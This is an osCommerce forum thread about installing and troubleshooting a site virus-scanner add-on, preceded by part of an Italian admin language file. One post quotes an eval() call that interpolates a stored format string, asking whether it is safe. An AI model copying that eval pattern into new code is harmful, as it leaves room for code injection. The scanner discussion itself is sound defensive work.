define('TEXT_DISPLAY_NUMBER_OF_SPECIALS', 'Visualizzati <b>%d</b> su <b>%d</b> (di <b>%d</b> prodotti in offerta)');

define('TEXT_DISPLAY_NUMBER_OF_TAX_CLASSES', 'Visualizzati <b>%d</b> su <b>%d</b> (di <b>%d</b> tipi di tassa)');

define('TEXT_DISPLAY_NUMBER_OF_TAX_ZONES', 'Visualizzate <b>%d</b> su <b>%d</b> (di <b>%d</b> tasse stat./prov)');

define('TEXT_DISPLAY_NUMBER_OF_TAX_RATES', 'Visualizzate <b>%d</b> su <b>%d</b> (di <b>%d</b> aliquote di tassa)');

define('TEXT_DISPLAY_NUMBER_OF_ZONES', 'Visualizzati <b>%d</b> su <b>%d</b> (di <b>%d</b> stati/Province)');

 

define('PREVNEXT_BUTTON_PREV', '<<');

define('PREVNEXT_BUTTON_NEXT', '>>');

 

define('TEXT_DEFAULT', 'default');

define('TEXT_SET_DEFAULT', 'Setta come Default');

define('TEXT_FIELD_REQUIRED', ' <span class="fieldRequired">* Richiesto</span>');

 

define('ERROR_NO_DEFAULT_CURRENCY_DEFINED', 'Errore: Non cè un valore di Default settato. Settane uno da: Tool Amministrazione->Localizzazione->Valute');

 

define('TEXT_CACHE_CATEGORIES', 'Box Categorie');

define('TEXT_CACHE_MANUFACTURERS', 'Box Produttori');

define('TEXT_CACHE_ALSO_PURCHASED', 'Also Purchased Module');

 

define('TEXT_NONE', '--none--');

define('TEXT_TOP', 'Top');

 

define('ERROR_DESTINATION_DOES_NOT_EXIST', 'Errore: Destinazione non esistente.');

define('ERROR_DESTINATION_NOT_WRITEABLE', 'Errore: Destinazione non scrivibile.');

define('ERROR_FILE_NOT_SAVED', 'Errore: File upload non salvato.');

define('ERROR_FILETYPE_NOT_ALLOWED', 'Errore: Tipo di file upload non consentito.');

define('SUCCESS_FILE_SAVED_SUCCESSFULLY', 'Successo: File upload saved successfully.');

define('WARNING_NO_FILE_UPLOADED', 'Warning: Nessuno file uplodato.');

define('WARNING_FILE_UPLOADS_DISABLED', 'Warning: Il meccanismo di file uploads è disabilitato nel file di configurazione php.ini.');

 

//TotalB2B start

define('BOX_CUSTOMERS_GROUPS', 'Grouppi');

define('BOX_MANUDISCOUNT', 'Discount Produttori');

define('BOX_CATEMANUDISCOUNT', 'Discount Categorie Produttori');

define('BOX_CATEDISCOUNT', 'Discount Categorie');

//TotalB2B end

 

//customersextrafileds start

define('BOX_TOOLS_EXTRA_FIELDS_MANAGER','Extra fields manager');

define('ENTRY_EXTRA_FIELDS_ERROR','Field %s must contain a minimum of %d characters');

define('TEXT_DISPLAY_NUMBER_OF_FIELDS', 'Displaying <b>%d</b> to <b>%d</b> (of <b>%d</b> Fields)');

//customersextrafileds end

 

//extrapages start

define('BOX_TOOLS_PAGE_MANAGER', 'Extra info Pages Manager');

define('TEXT_DISPLAY_NUMBER_OF_PAGES', 'Displaying <b>%d</b> to <b>%d</b> (of <b>%d</b> Pages)');

//extrapages end

 

// START: Product Extra Fields

define('BOX_CATALOG_PRODUCTS_EXTRA_FIELDS', 'Product Extra Fields');

// END: Product Extra Fields

 

//FAQDesk 2.1

define('BOX_TOOLS_FAQ', 'FAQ Manager');

//FAQDesk 2.1

 

//Stats Low Stock

define('BOX_REPORTS_STOCK_LEVEL', 'Low Stock Report');

//Stats Low Stock

 

//++++ QT Pro: Begin Changed code

define('BOX_REPORTS_STATS_LOW_STOCK_ATTRIB', 'Stock Report');

//++++ QT Pro: End Changed Code

 

define('BOX_TOOLS_SLIDESHOW', 'Slideshow');

define('BOX_CATALOG_SLIDESHOW', 'Slideshow');

define('TEXT_DISPLAY_NUMBER_OF_SLIDES', 'Displaying <b>%d</b> to <b>%d</b> (of <b>%d</b> slides)');

 

//Feeder Systems

define('BOX_FEEDERS_GOOGLE', 'Google Base');

define('TEXT_FEEDERS_BING', 'Create and Upload a Bing datafeed');

define('TEXT_FEEDERS_BING_NOFTP', 'Create and <b>do not</b> upload a Bing datafeed');

define('TEXT_FEEDERS_GOOGLE', 'Create and Upload a GoogleBase datafeed');

define('TEXT_FEEDERS_GOOGLE_NOFTP', 'Create and <b>do not</b> upload a GoogleBase datafeed');

define('BOX_MODULES_LIVEHELPNOW', 'LiveHelpNow');

?>

Link to comment
Share on other sites

  • 2 months later...

Hopefully this thread is still being watched ;)

 

I've installed VTS 1.0.13 on my osc 2.3.1 and it works right out the box! Thanks!

 

But, when I run some scans I found a lot of eval() and iframe warnings. I didn't expect so much, since it is a fairly fresh install with not that much addons yet. When looking at some of the code I think most (perhaps all) is standard programming. Maybe you guys can help me investigate some of the code?

 

For example, public_html/shop/includes/functions/general.php has:

$fmt = $address_format['format'];

eval("\$address = \"$fmt\";");

Is this a correct use of the eval item?

 

And is it also common used in .js? I see some warnings for ext/jquery/fancybox/jquery.. and ext/jquery/ui/jquery..

 

 

Also with the other scan option I found some like:

shop/includes/modules/payment/authorizenet_cc_aim.php...SUSPECTED (shell execution)

This goes for a few more payment options, which I don't use within my osc install. Is it safe to delete those files? Or are they no threat at all?

Link to comment
Share on other sites

  • 4 months later...

Package renamed to OSC Virus Scanner.

 

Updated virus definitions.

 

New check added to see if there are any files on the site that are not in the stock OSC packages. 2.3.1, RC2A and MS2.

 

You can manually add the names of the files in any add-ons installed to the list so they are not flagged.

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

I ve installed the latest OSC Virus Scanner on a 2.3.3 version i am working on now, but i think that the following instructions:

 

* in catalog/admin/includes/filename.php

- add this before final ?>

 

define('FILENAME_HEADER_VTS', 'av.php');

 

should be like this :

 

* in catalog/admin/includes/filename.php

- add this before final ?>

 

define('FILENAME_VTS', 'av.php');

Edited by 29gk
Link to comment
Share on other sites

I'm pretty familiar with installing new contribs but this one im stumped from. Im running 2.2 RCa2, and have it installed but it's not scanning anything. I set debug mode to on and when i scan file contents is shows

 

Loaded 298 virus definitions

Loaded 64 files definitions

 

nothing else, is some edit suppose to be made to an header file

Link to comment
Share on other sites

Which menu option are you selecting?

 

Does it start another script?

 

If so which one?

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

Well I've tried both OscVS & OscVSa, and it goes to the next page, the progress bar says waiting for mysite.com to respond then the page just stays blank and stops working... I think it may have something to do with my host settings declared in whitespace.php, maybe it cant connect to ftp, so here is what i got.

 

$ftp_site = 'mywebsite.com'; // your ftp site (this is actually declared correctly, just dont want google indexing my real sites keywords to this thread)

$ftp_usr = '*******'; // your ftp username

$ftp_pwd = '*******'; // your ftp password

$ftp_root = 'mywebsite.com/'; // your ftp site root folder (Im confused on this part)

 

My entire site sits in the root of the site, so for example ---- mysite.com/admin/includes/.....

Link to comment
Share on other sites

I have just overwritten my copy of VS with 2.0.1 and using the default settings get

 

 

Scan Completed

osCommerce Virus & Threat Scan v2.0.2

 

Scan root: /home/xxxxx/xxxxxxxx/xxxxxx/xxxxxxxxxxxxxxxxx

 

Threats Definitions: 298

Files Definitions: 64

Scanned folders: 285

Scanned files: 1562

Possible Infected files: 42

Possible Threat files: 12

Whitespace found: 71

 

Try getting it to work with the default settings and then start "adjusting it".

 

$rmv_ws = false; // OFF

 

Removing white space is "under development" and will probably stay that way.

 

Some hosts do not allow ftp from within scripts.

 

Cheers

 

G

Edited by geoffreywalton

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

New check added to see if any php files exist in the images directory.

 

HTH

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

  • 3 months later...

Check with your web host about your hosting environment

 

There are several variables that may affect some with large data files when using Easy Populate. These can usually be adjusted to fit your needs in a Linux/Apache environment by adding a php.ini file in your /admin/ folder. Do check with your host on this to ensure that a) it can be done, and B) you're staying within your Terms of Service. This forum post may help:

http://www.oscommerce.com/forums/index.php?showtopic=162244&st=5900&p=1101458entry1101458

 

When these factors come into play, often the script will simply halt with no error message.

 

The following php.ini settings are considered to be "default" by most hosts. Adjust higher as needed.

 

· max_execution_time = 30 ;(in seconds)

Change this to allow for more time that PHP can process your import file.

 

· max_input_time = 60 ;(in seconds)

post_max_size = 2M ;

upload_max_filesize = 2M ;

These will limit the size of a file you can import using Easy Populate. This can be circumvented by uploading the file via FTP to your /temp/ folder and importing it from there.

 

· memory_limit = 8M ;

Change this to allow PHP to use more memory to process your file. (32M recommended)

 

· session.gc_maxlifetime = 1440 ; (in seconds)

Your session lifetime, should always be longer then the max_execution_time.

 

HTH

 

G

 

Hi Geoffery,

I had the error messages came up as below list:

Fatal error: Allowed memory size of 67108864 bytes exhausted (tried to allocate 18373286 bytes) in /home/public_html/admin/AV/oscVSa.php on line 343

Fatal error: Maximum execution time of 30 seconds exceeded in /home/public_html/admin/AV/oscVSb.php on line 153

Fatal error: Allowed memory size of 67108864 bytes exhausted (tried to allocate 18373286 bytes) in /home/public_html/admin/AV/oscVS.php on line 288

 

How can I add the PHP.INI file, is there a sample PHP.INI file that I can use?

 

Many thanks in advance.

 

Lyn

 

PS. I had change admin folder name, just put admin here for example.

I did not installed easy populate addon, but I had check the link you provided, I couldn't find the config.ini on sever as well.

Edited by ce7
Link to comment
Share on other sites

Try this in google

 

site:www.oscommerce.com/forums php.ini

 

HTH

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...